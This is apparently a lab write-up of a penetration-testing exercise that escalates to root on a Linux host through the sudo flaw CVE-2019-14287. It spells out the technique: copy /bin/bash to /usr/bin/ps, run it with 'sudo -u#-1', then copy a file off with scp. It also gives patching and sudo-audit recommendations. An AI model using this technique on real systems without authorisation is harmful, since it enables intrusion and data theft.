Gary Jones
Gary Jones
Privilege EscalationCVE-2019-14287SudoExploit-DBLinux SecurityCybersecurity

Privilege Escalation on Devbox Using Sudo Exploit

Privilege Escalation on Devbox Using Sudo Exploit
0 views
3 min read
#Privilege Escalation#CVE-2019-14287#Sudo#Exploit-DB#Linux Security#Cybersecurity
Table Of Content

Privilege Escalation on Devbox Using Sudo Exploit

Situation:

The goal of this exercise was to exploit a Linux machine, devbox.artstailor.com, by leveraging a relatively recent vulnerability. Changes to the machine's configuration rendered previously successful methods ineffective, requiring new techniques for privilege escalation and access.

Obstacles:

  1. Configuration Changes:
    • Prior exploitation methods were no longer viable due to system updates.
  2. Limited Exploit Options:
    • Identifying applicable vulnerabilities required detailed system and kernel analysis.
  3. Dynamic Environment:
    • Changes in system behavior necessitated creative adaptation of known exploits.

Actions Taken:

  1. System Enumeration:
    • Ran cat /etc/os-release to identify the operating system and kernel version.
    • Analyzed system logs, kernel details, and services for exploitable vulnerabilities.
  2. Identified Vulnerability:
    • Found a Sudo vulnerability (CVE-2019-14287) that allowed privilege escalation using the sudo -u#-1 flag with a valid user password.
    • Referenced Exploit-DB entry: https://www.exploit-db.com/exploits/47502.
  3. Privilege Escalation:
    • Created a malicious copy of /bin/bash into /usr/bin/ps using cp.
    • Used sudo -u#-1 /usr/bin/ps to execute the copied binary with root privileges.
  4. File System Access:
    • Gained root access and explored the system directories.
    • Located MyDream.png in the /home/opp directory.
    • Transferred the file to the Kali host for review using scp.

Results:

  1. Root Access Achieved:
    • Exploited the Sudo vulnerability to gain full administrative control over devbox.artstailor.com.
  2. Sensitive File Obtained:
    • Accessed MyDream.png, which was not intended to be accessible by the current user.
  3. Security Flaws Identified:
    • The presence of exploitable Sudo configurations posed critical risks.

Tool Purpose Overview:

Sudo:

  • A command that allowed privilege escalation by exploiting the -u#-1 flag vulnerability.

scp:

  • Used to securely transfer the file MyDream.png from devbox.artstailor.com to the Kali host.

cat:

  • Displayed the system's release and kernel information to identify potential vulnerabilities.

Exploit-DB:

  • Served as a reference database for identifying known exploits applicable to the system.

Recommendations:

  1. Patch Management:
    • Ensure all systems are updated to address known vulnerabilities such as CVE-2019-14287.
  2. Audit Sudo Configurations:
    • Regularly review and restrict Sudo permissions to mitigate privilege escalation risks.
  3. Session Management:
    • Clear command-line histories and cached data to prevent leakage of sensitive information.
  4. Regular Penetration Testing:
    • Continuously test and evaluate system defenses to identify exploitable vulnerabilities.

View PDF Document